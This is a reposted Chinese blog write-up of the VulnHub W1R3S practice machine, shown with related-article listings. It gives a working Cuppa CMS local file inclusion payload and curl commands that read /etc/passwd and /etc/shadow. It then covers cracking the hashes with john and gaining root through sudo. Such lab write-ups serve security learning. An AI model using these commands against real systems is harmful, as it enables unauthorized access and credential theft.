vulnhub靶机实战——W1R3S

最新推荐文章于 2024-07-21 17:45:24 发布
转载 最新推荐文章于 2024-07-21 17:45:24 发布 · 495 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Aasion/p/10859018.html

本文记录了一次靶机渗透过程,通过nmap扫描发现开放端口,利用FTP匿名登录及CMS LFI漏洞获取敏感信息,最终实现SSH登录并获得root权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

环境

 

靶机ip:192.168.163.132

攻击机ip:192.168.163.129

目的:拿下靶机并获得root权限

 

渗透

首先nmap扫描端口

nmap -sC -sV 192.168.163.132

可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。

首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有没有可利用的文件。

各种文件夹翻了一遍并没有什么东西,找的时候发现两串hash,解密hash内容一个是这不是密码,另一个是告诉我们没有这么简单(心疼解密时花的一块钱),放弃ftp

访问80,是apache的默认页面,没什么发现。

使用gobuster扫目录

这个时候我们发现了两个有趣的目录

/wordpress和/administrator

访问了wordpress,也是没什么东西。

于是访问/administrator,发现cms是cuppa

 果断找这个cms的漏洞,只有一个先下载下来看看

看到这个cms存在lfi漏洞,根据txt中的内容进行构造url

http://192.168.163.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在浏览器中输入上面的URL,页面没有任何返回。
尝试使用curl命令,对参数urlconfig的参数进行urlencode
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.163.132/administrator/alerts/alertConfigField.php 
成功显示,修改命令为
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow  http://192.168.163.132/administrator/alerts/alertConfigField.php

把有密码的几个用户信息全部复制下来,放入pass.txt中

john pass.txt解出一个w1r3s的密码,ssh登陆

尝试root

命令行输入sudo -l(此处因为比较简单所以懒得截图了,凑活看吧)

w1r3s@W1R3S:~$ sudo -l
sudo: unable to resolve host W1R3S
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User w1r3s may run the following commands on W1R3S:
    (ALL : ALL) ALL

 

这时我们看到,w1r3s用户可运行任何命令

sudo su即可切换到root

 ps:靶机比较简单,写这个文章只是为了记录一下,仅此而已。

转载于:https://www.cnblogs.com/Aasion/p/10859018.html

Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2183
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1436
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
vulnhub靶机实战——Matrix:1
weixin_30420305的博客
05-24 310
环境 靶机ip:192.168.163.139 攻击机ip:192.168.163.129 目标:拿下靶机root权限 知识点 生成专属的爆破字典,受限shell rbash的绕过 渗透 首先nmap扫描靶机开启的端口 开了三个端口,分别是22的ssh,80和31337的http 看到31337开着http就觉得很可疑,感觉十有八九突破点是这个web ...
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2544
Vulnhub DC-1、DC-2靶机通关手册
VulnHub靶机-SkyTower
Slow_的博客
02-26 905
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
W1R3S - VulnHub(漏洞靶机渗透测试)
Start C的博客
12-05 1200
VulnHub靶机学习 - W1R3S
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 1027
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1362
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
Vulnhub靶机实战——DC-4
冠霖L的博客
09-27 3306
靶机DC-4下载地址:https://download.vulnhub.com/dc/DC-4.zip 描述:从靶机DC-3开始,只有一个入口和一个最终的flag,只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境:Vmware 15 Pro虚拟机软件 DC-4靶机IP地址:192.168.220.138 Kali的IP地址:...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9267
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机: DarkHole
sszsNo1的博客
07-02 266
Vulnhub靶机: DarkHole如何打靶
Vulnhub靶机实战-NARAK
黑白的博客
01-18 1148
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
Vulnhub靶机实战-HA AVENGERS ARSENAL
黑白的博客
01-10 499
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 渗透 目标,寻找五位超级英雄的武器,漫威题材,还挺有意思 VIBRANIUM SHIELD美队的盾牌 MJØLNIR 雷神之锤 SCEPTRE 洛基权杖 STORMBREAKER 雷神的风暴战斧 YAKA ARROW 勇度的亚卡箭 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.195 -p 1-65535 -o
Vulnhub靶机实战-Lazysysadmin
黑白的博客
01-10 415
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A 有意思,开启端口不少 发现开启80,22,139,445,3306,6667 访问80 http://192.168.239.15 扫描目录 python3 dirsearch.py -u http:
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1968
Vulnhub-CTF5靶机实战
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2914
Vulnhub-Btrsys-2靶机实战
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
VulnHub靶机渗透实战(详细思路讲解)
最新发布
weixin_65891791的博客
07-21 2243
使用kali中的namp工具扫描开放端口,这时kali会用一个端口号向目标主机的65535个端口发送TCP连接建立请求,回应了ack=1,syn=q的端口就是开放端口号,这里可以看到21,22,80,3306号端口是开放的。可以看到这里得到了很多哈希,带*号的是禁用的或者是空密码,将三个不带星号的密码复制下来,创建一个shell.txt文档,将三个密码复制进去。这里看到我们是没有成功进入这个网页的,应该是目录的问题,我们将目录修改一下,但是没有显示出来,可能是编码问题,再回到我们找到的源码。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值